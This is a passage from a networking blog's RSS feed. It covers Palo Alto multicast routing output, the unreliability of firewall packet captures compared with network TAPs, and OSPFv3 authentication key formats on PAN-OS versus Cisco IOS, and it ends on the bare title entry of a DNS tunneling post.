weberjoh@pa-lab&gt;
weberjoh@pa-lab&gt; show advanced-routing multicast route group 239.23.11.10

Flags: S - Sparse, C - Connected, P - Pruned, M - SSM, R - SGRpt Pruned, F - FHR flag, T - SPT-bit set

Logical router: default

group          source              flags     Proto     incoming            outgoing            TTL  Uptime
239.23.11.10   *                   SC        IGMP      ethernet1/1         ethernet1/5.51      1    00:11:04
                                             PIM                           ethernet1/5.131     1    00:09:16
239.23.11.10   192.168.124.12      ST        IGMP      ethernet1/1         ethernet1/5.51      1    00:11:04
                                             PIM                           ethernet1/5.131     1    00:09:16
total route shown: 2


weberjoh@pa-lab&gt;
weberjoh@pa-lab&gt;
weberjoh@pa-lab&gt; show advanced-routing multicast fib group 239.23.11.10

Logical Router:  default

maximum of mfib entries for this mfib:  275
number of mfib entries for this mfib:   3
number of mfib entries shown:           2

group            source           flags  incoming             outgoing
-----            ------           -----  --------             --------
239.23.11.10     0.0.0.0          1      ethernet1/1          ethernet1/5.131
                                                              ethernet1/5.51
239.23.11.10     192.168.124.12   2      ethernet1/1          ethernet1/5.131
                                                              ethernet1/5.51


weberjoh@pa-lab&gt;
weberjoh@pa-lab&gt;
weberjoh@pa-lab&gt; show advanced-routing multicast pim state group 239.23.11.10

Logical router: default

(*, G):

group               RP                  up time   upstream join  join timer     RPF interface                           RPF next hop

239.23.11.10        10.0.0.1            00:11:41  Joined         00:00:20       ethernet1/1                             192.168.3.99/32

    oil interface                           local membership    join/prune          join expire timer   prune pending timer assert st           assert timer        assert winner addr  assert winner metric
    ethernet1/5.51      LOCAL               NOINFO              --:--               --:--               NOINFO              --:--               0.0.0.0             infinity

    ethernet1/5.131     NOINFO              JOIN                02:42               --:--               NOINFO              --:--               0.0.0.0             infinity

    pimreg              N/A                 JOIN                02:42               --:--               NOINFO              --:--               0.0.0.0             infinity

(S, G):

group               source              up time   upstream nbr        upstream join  join timer     RPF next hop        DR reg    DR reg stop timer   SPT

239.23.11.10        192.168.124.12      00:11:41  192.168.3.99        Joined         00:00:20       192.168.3.99/32     RegNoInfo --:--:--            False

    oil interface                           local membership    join/prune          join expire timer   prune pending timer assert st           assert timer        assert winner addr  assert winner metric
    ethernet1/5.131     NOINFO              JOIN                02:41               --:--               NOINFO              --:--               0.0.0.0             infinity


weberjoh@pa-lab&gt;</pre><p>
Finally, this is how R3 looked like during the session:</p><pre class="urvanov-syntax-highlighter-plain-tag">R3#show ip pim neighbor
PIM Neighbor Table
Mode: B - Bidir Capable, DR - Designated Router, N - Default DR Priority,
      P - Proxy Capable, S - State Refresh Capable, G - GenID Capable
Neighbor          Interface                Uptime/Expires    Ver   DR
Address                                                            Prio/Mode
10.23.1.1         FastEthernet0/0          1d21h/00:01:39    v2    1 / G
R3#
R3#
R3#show ip mroute 239.23.11.10
IP Multicast Routing Table
Flags: D - Dense, S - Sparse, B - Bidir Group, s - SSM Group, C - Connected,
       L - Local, P - Pruned, R - RP-bit set, F - Register flag,
       T - SPT-bit set, J - Join SPT, M - MSDP created entry, E - Extranet,
       X - Proxy Join Timer Running, A - Candidate for MSDP Advertisement,
       U - URD, I - Received Source Specific Host Report,
       Z - Multicast Tunnel, z - MDT-data group sender,
       Y - Joined MDT-data group, y - Sending to MDT-data group,
       V - RD &amp; Vector, v - Vector
Outgoing interface flags: H - Hardware switched, A - Assert winner
 Timers: Uptime/Expires
 Interface state: Interface, Next-Hop or VCD, State/Mode

(*, 239.23.11.10), 01:19:52/stopped, RP 10.0.0.1, flags: SJC
  Incoming interface: FastEthernet0/0, RPF nbr 10.23.1.1
  Outgoing interface list:
    FastEthernet0/1.132, Forward/Sparse, 00:10:13/00:01:56

(192.168.124.12, 239.23.11.10), 01:19:51/00:02:34, flags: JT
  Incoming interface: FastEthernet0/0, RPF nbr 10.23.1.1
  Outgoing interface list:
    FastEthernet0/1.132, Forward/Sparse, 00:10:13/00:01:56

R3#
R3#
R3#show ip igmp groups 239.23.11.10
IGMP Connected Group Membership
Group Address    Interface                Uptime    Expires   Last Reporter   Group Accounted
239.23.11.10     FastEthernet0/1.132      00:10:33  00:02:42  192.168.132.11
R3#</pre><p>
<h2>The End</h2>
<p>Uff. ;) That&#8217;s it for now. Of course, you can configure other scenarios, such as setting the Rendezvous Point on the Palo itself or using filters for various settings. But not for me this time.</p>
<p>Soli Deo Gloria!</p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/packetowl-suricata-ids-basiertes-hochleistungs-nsm" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketOwl.1208x232.webp" /></a></div>
<p><span class="text-Kvkr6N truncate-Pc_c1s textS-BC51wP">Photo by <a href="https://unsplash.com/@junscythe?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Jeanson Wong</a> on <a href="https://unsplash.com/photos/lights-on-road-YRn96vHg5b8?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Unsplash</a></span>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://weberblog.net/multicast-routing-w-palo/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">14037</post-id>	</item>
		<item>
		<title>Don&#8217;t Trust Packet Captures on Firewalls</title>
		<link>https://weberblog.net/dont-trust-packet-captures-on-firewalls/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=dont-trust-packet-captures-on-firewalls</link>
					<comments>https://weberblog.net/dont-trust-packet-captures-on-firewalls/#comments</comments>
		
		<dc:creator><![CDATA[Johannes Weber]]></dc:creator>
		<pubDate>Wed, 18 Feb 2026 10:39:13 +0000</pubDate>
				<category><![CDATA[Packet Capture]]></category>
		<category><![CDATA[Palo Alto Networks]]></category>
		<category><![CDATA[ProfiShark]]></category>
		<category><![CDATA[TAP]]></category>
		<category><![CDATA[Wireshark]]></category>
		<guid isPermaLink="false">https://weberblog.net/?p=14001</guid>

					<description><![CDATA[<img width="300" height="169" src="https://weberblog.net/wp-content/uploads/2025/11/Dont-Trust-Packet-Captures-on-Firewalls-featured-image-300x169.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2025/11/Dont-Trust-Packet-Captures-on-Firewalls-featured-image-300x169.jpg 300w, https://weberblog.net/wp-content/uploads/2025/11/Dont-Trust-Packet-Captures-on-Firewalls-featured-image-1024x576.jpg 1024w, https://weberblog.net/wp-content/uploads/2025/11/Dont-Trust-Packet-Captures-on-Firewalls-featured-image-768x432.jpg 768w, https://weberblog.net/wp-content/uploads/2025/11/Dont-Trust-Packet-Captures-on-Firewalls-featured-image-1536x864.jpg 1536w, https://weberblog.net/wp-content/uploads/2025/11/Dont-Trust-Packet-Captures-on-Firewalls-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" />The other day, I was troubleshooting some network-related stuff, using the built-in Packet Capture on a Palo Alto Networks firewall. And while it did the job at a first glance, I stumbled upon some packets that were simply not correct, read: were not present on the Ethernet cable at all and/or were missing some content. &#8230; <a href="https://weberblog.net/dont-trust-packet-captures-on-firewalls/" class="more-link">Continue reading <span class="screen-reader-text">Don&#8217;t Trust Packet Captures on Firewalls</span> <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<img width="300" height="169" src="https://weberblog.net/wp-content/uploads/2025/11/Dont-Trust-Packet-Captures-on-Firewalls-featured-image-300x169.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2025/11/Dont-Trust-Packet-Captures-on-Firewalls-featured-image-300x169.jpg 300w, https://weberblog.net/wp-content/uploads/2025/11/Dont-Trust-Packet-Captures-on-Firewalls-featured-image-1024x576.jpg 1024w, https://weberblog.net/wp-content/uploads/2025/11/Dont-Trust-Packet-Captures-on-Firewalls-featured-image-768x432.jpg 768w, https://weberblog.net/wp-content/uploads/2025/11/Dont-Trust-Packet-Captures-on-Firewalls-featured-image-1536x864.jpg 1536w, https://weberblog.net/wp-content/uploads/2025/11/Dont-Trust-Packet-Captures-on-Firewalls-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" /><p>The other day, I was troubleshooting some network-related stuff, using the built-in Packet Capture on a Palo Alto Networks firewall. And while it did the job at a first glance, <strong>I stumbled upon some packets that were simply not correct, read: were not present on the Ethernet cable at all and/or were missing some content</strong>.</p>
<div class="su-note"  style="border-color:#69adc8;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;"><div class="su-note-inner su-u-clearfix su-u-trim" style="background-color:#83c7e2;border-color:#ffffff;color:#333333;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;">This proves again what the TAP vendors always claim: <strong>Don&#8217;t use internal packet captures / SPAN ports at all when you&#8217;re really serious about the truth. You MUST use network TAPs!</strong></div></div>
<p><span id="more-14001"></span></p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/packethawk-inline-bypass-network-tap" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketHawk.1208x232.webp" /></a></div>
<p>Let&#8217;s have a short look. I was configuring <a href="https://weberblog.net/ospfv3-authentication-on-a-palo-alto-logical-router/">OSPFv3 with authentication between a Palo NGFW and a Cisco router</a>. I wanted to validate those authentication headers (IPsec AH) with the usage of a packet capture and Wireshark. Hence, I captured on the Palo itself, filtering on the ingress interface, at all four stages. Later on, I added a real TAP, my <a href="https://weberblog.net/my-network-companion-the-profishark/">ProfiShark from Profitap</a>:</p>
<p><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14008" src="https://weberblog.net/wp-content/uploads/2025/11/Palo-Alto-Packet-Capture-and-TAP-1024x708.png" alt="" width="604" height="418" srcset="https://weberblog.net/wp-content/uploads/2025/11/Palo-Alto-Packet-Capture-and-TAP-1024x708.png 1024w, https://weberblog.net/wp-content/uploads/2025/11/Palo-Alto-Packet-Capture-and-TAP-300x207.png 300w, https://weberblog.net/wp-content/uploads/2025/11/Palo-Alto-Packet-Capture-and-TAP-768x531.png 768w, https://weberblog.net/wp-content/uploads/2025/11/Palo-Alto-Packet-Capture-and-TAP.png 1188w" sizes="auto, (max-width: 604px) 100vw, 604px" /></p>
<p>The interesting part is: The receive stage (rx) showed OSPFv3 packets originated and sent by the Palo firewall itself (why in the rx stage?), missing the auth header that was present in the transmit stage! That is, there are two failures in this capture: <strong>Outgoing packets are captured in the rx stage</strong> (in other words: I would think that this packet was actually *received* by the firewall), and furthermore, <strong>those packets were NOT exactly those that were present on the tx stage at all</strong>. Here&#8217;s my side-by-side comparison of the RX/TX/TAP captures:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2025/11/3x-Wireshark-Palo-rxtx-and-ProfiShark-TAP-OSPFv3-Auth-Header.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14009" src="https://weberblog.net/wp-content/uploads/2025/11/3x-Wireshark-Palo-rxtx-and-ProfiShark-TAP-OSPFv3-Auth-Header-1024x552.png" alt="" width="604" height="326" srcset="https://weberblog.net/wp-content/uploads/2025/11/3x-Wireshark-Palo-rxtx-and-ProfiShark-TAP-OSPFv3-Auth-Header-1024x552.png 1024w, https://weberblog.net/wp-content/uploads/2025/11/3x-Wireshark-Palo-rxtx-and-ProfiShark-TAP-OSPFv3-Auth-Header-300x162.png 300w, https://weberblog.net/wp-content/uploads/2025/11/3x-Wireshark-Palo-rxtx-and-ProfiShark-TAP-OSPFv3-Auth-Header-768x414.png 768w, https://weberblog.net/wp-content/uploads/2025/11/3x-Wireshark-Palo-rxtx-and-ProfiShark-TAP-OSPFv3-Auth-Header-1536x828.png 1536w, https://weberblog.net/wp-content/uploads/2025/11/3x-Wireshark-Palo-rxtx-and-ProfiShark-TAP-OSPFv3-Auth-Header-2048x1104.png 2048w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p>Q.E.D.</p>
<p>Is this intentional? Well, concerning the &#8220;receive stage&#8221;, the docs read: &#8220;When the packet is received on the dataplane processor.&#8221; Maybe those OSPFv3 packets are forwarded/transmitted/received internally from the control plane to the dataplane, so that they appear in the receive stage? Even with an &#8220;ingress interface&#8221; set as the capture filter.</p>
<p>(By the way: neither the drop nor the firewall stage showed any of those OSPFv3 packets. But that&#8217;s correct to my mind, since they aren&#8217;t dropped nor passing the firewall policies.)</p>
<div class="su-note"  style="border-color:#d88a59;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;"><div class="su-note-inner su-u-clearfix su-u-trim" style="background-color:#f2a473;border-color:#ffffff;color:#333333;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;">This proves that you&#8217;re getting something different from what you expected when using the built-in capture capabilities of network devices. That is: <strong>TAPs are a MUST!</strong></div></div>
<p>Well-known TAP vendors are <a href="https://neoxnetworks.com/network-traffic-tapping" target="_blank" rel="noopener">NEOX NETWORKS</a> or <a href="https://www.profitap.com/traffic-access/" target="_blank" rel="noopener">Profitap</a>, for example.</p>
<p>Don’t get me wrong. Packet captures on firewalls offer a quick and easy way to get an initial look at packets. In many cases, they are fully sufficient for troubleshooting layer 7 packets that simply pass <em>through</em> the firewall, where you just want to inspect the contents of a DNS query, for example.</p>
<p>However, as soon as you’re dealing with packets that are generated or modified <em>by</em> the firewall itself (routing protocols, NAT, IPsec, TLS interception, etc.), <strong>you can’t fully rely on these built-in packet captures</strong>. Unfortunately, this is exactly what happens regularly &#8211; to me as well.</p>
<p>For further reading, please consult at least parts 4 and 5 of <a href="https://www.linkedin.com/in/jasper-bongertz-9776a41/" target="_blank" rel="noopener">Jasper</a>&#8216;s <strong>Network Capture Playbook</strong>: <a href="https://blog.packet-foo.com/2016/11/the-network-capture-playbook-part-4-span-port-in-depth/" target="_blank" rel="noopener">SPAN Port In-Depth</a> and <a href="https://blog.packet-foo.com/2016/12/the-network-capture-playbook-part-5-network-tap-basics/" target="_blank" rel="noopener">TAP Basics</a>.</p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/network-traffic-tapping" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketRaven.1208x232.webp" /></a></div>
<p>Soli Deo Gloria!</p>
<p><span class="text-Kvkr6N truncate-Pc_c1s textS-BC51wP">Photo by <a href="https://unsplash.com/@thirtyspoke?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Ronda Dorsey</a> on <a href="https://unsplash.com/photos/trust-spelled-with-wooden-letter-blocks-on-a-table-ZoVR7mPHMGo?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Unsplash</a></span>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://weberblog.net/dont-trust-packet-captures-on-firewalls/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">14001</post-id>	</item>
		<item>
		<title>OSPFv3 Authentication on a Palo Alto (Logical Router)</title>
		<link>https://weberblog.net/ospfv3-authentication-on-a-palo-alto-logical-router/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=ospfv3-authentication-on-a-palo-alto-logical-router</link>
					<comments>https://weberblog.net/ospfv3-authentication-on-a-palo-alto-logical-router/#respond</comments>
		
		<dc:creator><![CDATA[Johannes Weber]]></dc:creator>
		<pubDate>Thu, 05 Feb 2026 10:37:43 +0000</pubDate>
				<category><![CDATA[Authentication]]></category>
		<category><![CDATA[IPv6]]></category>
		<category><![CDATA[Palo Alto Networks]]></category>
		<category><![CDATA[Routing]]></category>
		<category><![CDATA[AH]]></category>
		<category><![CDATA[OSPFv3]]></category>
		<category><![CDATA[SHA-1]]></category>
		<category><![CDATA[Wireshark]]></category>
		<guid isPermaLink="false">https://weberblog.net/?p=13984</guid>

					<description><![CDATA[<img width="300" height="169" src="https://weberblog.net/wp-content/uploads/2025/11/OSPFv3-Authentication-on-a-Palo-Alto-Logical-Router-featured-image-300x169.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2025/11/OSPFv3-Authentication-on-a-Palo-Alto-Logical-Router-featured-image-300x169.jpg 300w, https://weberblog.net/wp-content/uploads/2025/11/OSPFv3-Authentication-on-a-Palo-Alto-Logical-Router-featured-image-1024x576.jpg 1024w, https://weberblog.net/wp-content/uploads/2025/11/OSPFv3-Authentication-on-a-Palo-Alto-Logical-Router-featured-image-768x432.jpg 768w, https://weberblog.net/wp-content/uploads/2025/11/OSPFv3-Authentication-on-a-Palo-Alto-Logical-Router-featured-image-1536x864.jpg 1536w, https://weberblog.net/wp-content/uploads/2025/11/OSPFv3-Authentication-on-a-Palo-Alto-Logical-Router-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" />I had a hard time figuring out how to configure OSPFv3 authentication on a Palo Alto Networks NGFW due to its different configuration formats compared to a Cisco router. TL;DR: The SPI must be set in hexadecimal, while the actual key (40 chars, hexadecimal) must be grouped in 5 sections, separated with hyphens. Talking about &#8230; <a href="https://weberblog.net/ospfv3-authentication-on-a-palo-alto-logical-router/" class="more-link">Continue reading <span class="screen-reader-text">OSPFv3 Authentication on a Palo Alto (Logical Router)</span> <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<img width="300" height="169" src="https://weberblog.net/wp-content/uploads/2025/11/OSPFv3-Authentication-on-a-Palo-Alto-Logical-Router-featured-image-300x169.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2025/11/OSPFv3-Authentication-on-a-Palo-Alto-Logical-Router-featured-image-300x169.jpg 300w, https://weberblog.net/wp-content/uploads/2025/11/OSPFv3-Authentication-on-a-Palo-Alto-Logical-Router-featured-image-1024x576.jpg 1024w, https://weberblog.net/wp-content/uploads/2025/11/OSPFv3-Authentication-on-a-Palo-Alto-Logical-Router-featured-image-768x432.jpg 768w, https://weberblog.net/wp-content/uploads/2025/11/OSPFv3-Authentication-on-a-Palo-Alto-Logical-Router-featured-image-1536x864.jpg 1536w, https://weberblog.net/wp-content/uploads/2025/11/OSPFv3-Authentication-on-a-Palo-Alto-Logical-Router-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" /><p>I had a hard time figuring out how to configure <strong>OSPFv3 authentication on a Palo Alto Networks NGFW</strong> due to its different configuration formats compared to a Cisco router.</p>
<p>TL;DR: <strong>The SPI must be set in hexadecimal, while the actual key (40 chars, hexadecimal) must be grouped in 5 sections, separated with hyphens.</strong></p>
<p><span id="more-13984"></span></p>
<p>Talking about <a href="https://weberblog.net/ospfv3-with-ipsec-authentication/">Cisco&#8217;s IOS, OSPFv3 authentication is set at the interface configuration level with the following command</a>:</p><pre class="urvanov-syntax-highlighter-plain-tag">ipv6 ospf authentication ipsec spi &lt;256-4294967295&gt; sha1 &lt;hey-string 40 chars&gt;</pre><p>
e.g.:</p><pre class="urvanov-syntax-highlighter-plain-tag">ipv6 ospf authentication ipsec spi 305419896 sha1 CC41D07E889B5D610FAE78E88E88C559E45D1021</pre><p>
However, trying to set those values on Palo&#8217;s OSPFv3 Auth Profile, I encountered the following commit error: <code>Error: Failed to parse IPSec manual-key tunnel/profile 'ah-sha1' authentication key</code>.</p>
<p><a href="https://weberblog.net/wp-content/uploads/2025/11/Palo-Alto-OSPFv3-Auth-Profile-wrong-format-commit-error.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-13989" src="https://weberblog.net/wp-content/uploads/2025/11/Palo-Alto-OSPFv3-Auth-Profile-wrong-format-commit-error.png" alt="" width="753" height="628" srcset="https://weberblog.net/wp-content/uploads/2025/11/Palo-Alto-OSPFv3-Auth-Profile-wrong-format-commit-error.png 753w, https://weberblog.net/wp-content/uploads/2025/11/Palo-Alto-OSPFv3-Auth-Profile-wrong-format-commit-error-300x250.png 300w" sizes="auto, (max-width: 753px) 100vw, 753px" /></a></p>
<p>Luckily, I wasn&#8217;t the first person struggling with this, hence DuckDuckGo led me to this post: &#8220;<a href="https://ip-life.net/ospfv3-authentication-palo-alto-to-cisco-router/" target="_blank" rel="noopener">OSPFv3 Authentication Palo Alto to Cisco Router</a>&#8220;.</p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/packetroo-data-diode" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketRoo.1208x232.webp" /></a></div>
<div class="su-note"  style="border-color:#69adc8;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;"><div class="su-note-inner su-u-clearfix su-u-trim" style="background-color:#83c7e2;border-color:#ffffff;color:#333333;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;">That is: While the SPI is specified in decimal on Cisco&#8217;s IOS, it must be set in hexadecimal on PAN-OS. Meanwhile, the actual SHA-1 key with a length of 40 chars (hexadecimal) must be grouped into 5 sections, separated with hyphens. (For whatever reason.)</div></div>
<p>The corresponding values to the above-mentioned example are:</p><pre class="urvanov-syntax-highlighter-plain-tag">SPI: 0x12345678
Key: CC41D07E-889B5D61-0FAE78E8-8E88C559-E45D1021</pre><p>
Configured under Network -&gt; Routing -&gt; Routing Profiles -&gt; OSPFv3 -&gt; OSPFv3 Auth Profile (using a PA-440 with PAN-OS 11.2.10, Advanced Routing Engine enabled):</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-13992 size-full" src="https://weberblog.net/wp-content/uploads/2025/11/Palo-Alto-OSPFv3-Auth-Profile-AH-with-SHA-1.png" alt="" width="500" height="329" srcset="https://weberblog.net/wp-content/uploads/2025/11/Palo-Alto-OSPFv3-Auth-Profile-AH-with-SHA-1.png 500w, https://weberblog.net/wp-content/uploads/2025/11/Palo-Alto-OSPFv3-Auth-Profile-AH-with-SHA-1-300x197.png 300w" sizes="auto, (max-width: 500px) 100vw, 500px" /></p>
<p>(Of course, other hash algorithms than SHA-1 must be used, but my lab counterparts are not capable of it. ;))</p>
<p>Enabled either at the OSPFv3 &#8211; Area level:</p>
<p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-13995" src="https://weberblog.net/wp-content/uploads/2025/11/Palo-Alto-OSPFv3-Auth-Area.png" alt="" width="875" height="625" srcset="https://weberblog.net/wp-content/uploads/2025/11/Palo-Alto-OSPFv3-Auth-Area.png 875w, https://weberblog.net/wp-content/uploads/2025/11/Palo-Alto-OSPFv3-Auth-Area-300x214.png 300w, https://weberblog.net/wp-content/uploads/2025/11/Palo-Alto-OSPFv3-Auth-Area-768x549.png 768w" sizes="auto, (max-width: 875px) 100vw, 875px" /></p>
<p>OR at the <strong>individual Interface level</strong> (preferred from my point of view):</p>
<p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-13996" src="https://weberblog.net/wp-content/uploads/2025/11/Palo-Alto-OSPFv3-Auth-Interface.png" alt="" width="600" height="465" srcset="https://weberblog.net/wp-content/uploads/2025/11/Palo-Alto-OSPFv3-Auth-Interface.png 600w, https://weberblog.net/wp-content/uploads/2025/11/Palo-Alto-OSPFv3-Auth-Interface-300x233.png 300w" sizes="auto, (max-width: 600px) 100vw, 600px" /></p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/network-traffic-tapping" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketRaven.1208x232.webp" /></a></div>
<p>Now, the SPI is consistent with the representation in Wireshark. Note the &#8220;Authentication Header&#8221; within the IP header, as the OSPFv3 authentication leverages the IPv6 extension header for IPsec:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2025/11/Wireshark-OSPFv3-Authentication-Header-SPI.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-13991" src="https://weberblog.net/wp-content/uploads/2025/11/Wireshark-OSPFv3-Authentication-Header-SPI-1024x626.png" alt="" width="604" height="369" srcset="https://weberblog.net/wp-content/uploads/2025/11/Wireshark-OSPFv3-Authentication-Header-SPI-1024x626.png 1024w, https://weberblog.net/wp-content/uploads/2025/11/Wireshark-OSPFv3-Authentication-Header-SPI-300x183.png 300w, https://weberblog.net/wp-content/uploads/2025/11/Wireshark-OSPFv3-Authentication-Header-SPI-768x470.png 768w, https://weberblog.net/wp-content/uploads/2025/11/Wireshark-OSPFv3-Authentication-Header-SPI-1536x939.png 1536w, https://weberblog.net/wp-content/uploads/2025/11/Wireshark-OSPFv3-Authentication-Header-SPI.png 1747w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p>Speaking about the SPI, the hexadecimal format (Palo) makes more sense compared to the decimal format (Cisco). However, I find it rather nonsensical that you have to insert hyphens in the key. 🤦‍♂️</p>
<p>Final note: If you have set your intrazone-default policy (default: allow) to deny, you need explicit rules for OSPF to work. Little stumbling block here: <strong>with OSPFv3 authentication, you have to allow &#8220;ipsec-ah&#8221; in addition to &#8220;ospf&#8221; in order to work</strong>. Both the session table and the traffic log will show both applications (!), dependent on the originating node, which is either the Palo or the other routers on the network: (I&#8217;ve no idea where this &#8220;from port / to port&#8221; 20033 comes from.)</p>
<p><a href="https://weberblog.net/wp-content/uploads/2025/12/Palo-Alto-OSPFv3-Auth-Session-Browser.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14033" src="https://weberblog.net/wp-content/uploads/2025/12/Palo-Alto-OSPFv3-Auth-Session-Browser-1024x154.png" alt="" width="604" height="91" srcset="https://weberblog.net/wp-content/uploads/2025/12/Palo-Alto-OSPFv3-Auth-Session-Browser-1024x154.png 1024w, https://weberblog.net/wp-content/uploads/2025/12/Palo-Alto-OSPFv3-Auth-Session-Browser-300x45.png 300w, https://weberblog.net/wp-content/uploads/2025/12/Palo-Alto-OSPFv3-Auth-Session-Browser-768x116.png 768w, https://weberblog.net/wp-content/uploads/2025/12/Palo-Alto-OSPFv3-Auth-Session-Browser-1536x231.png 1536w, https://weberblog.net/wp-content/uploads/2025/12/Palo-Alto-OSPFv3-Auth-Session-Browser-2048x308.png 2048w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a> <a href="https://weberblog.net/wp-content/uploads/2025/12/Palo-Alto-OSPFv3-Auth-Traffic-Log.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14034" src="https://weberblog.net/wp-content/uploads/2025/12/Palo-Alto-OSPFv3-Auth-Traffic-Log-1024x153.png" alt="" width="604" height="90" srcset="https://weberblog.net/wp-content/uploads/2025/12/Palo-Alto-OSPFv3-Auth-Traffic-Log-1024x153.png 1024w, https://weberblog.net/wp-content/uploads/2025/12/Palo-Alto-OSPFv3-Auth-Traffic-Log-300x45.png 300w, https://weberblog.net/wp-content/uploads/2025/12/Palo-Alto-OSPFv3-Auth-Traffic-Log-768x115.png 768w, https://weberblog.net/wp-content/uploads/2025/12/Palo-Alto-OSPFv3-Auth-Traffic-Log-1536x230.png 1536w, https://weberblog.net/wp-content/uploads/2025/12/Palo-Alto-OSPFv3-Auth-Traffic-Log-2048x306.png 2048w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p>Soli Deo Gloria!</p>
<p><span class="text-Kvkr6N truncate-Pc_c1s textS-BC51wP">Photo by <a href="https://unsplash.com/@georgeprentzas?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">George Prentzas</a> on <a href="https://unsplash.com/photos/round-black-and-white-light-SRFG7iwktDk?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Unsplash</a></span>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://weberblog.net/ospfv3-authentication-on-a-palo-alto-logical-router/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">13984</post-id>	</item>
		<item>
		<title>DNS Tunneling: iodine</title>
		<link>https://weberblog.net/dns-tunneling-iodine/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=dns-tunneling-iodine</link>
					<comments>https://weberblog.net/dns-tunneling-iodine/#comments</comments>
		
		<dc:creator><![CDATA[Johannes Weber]]></dc:creator>
		<pubDate>Mon, 12 Jan 2026 18:45:21 +0000</pubDate>
				<category><![CDATA[DNS/DNSSEC]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Tutorial/Howto]]></category>
		<category><![CDATA[Attack]]></category>
		<category><![CDATA[DNS]]></category>
		<category><![CDATA[DNS Tunneling]]></category>
		<category><![CDATA[FortiGate]]></category>
		<category><![CDATA[Infoblox]]></category>
		<category><![CDATA[iodine]]></category>
		<category><![CDATA[Palo Alto Networks]]></category>
		<category><![CDATA[Proxy]]></category>
		<category><![CDATA[Ultimate PCAP]]></category>
		<category><![CDATA[Wireshark]]></category>
		<guid isPermaLink="false">https://weberblog.net/?p=13976</guid>

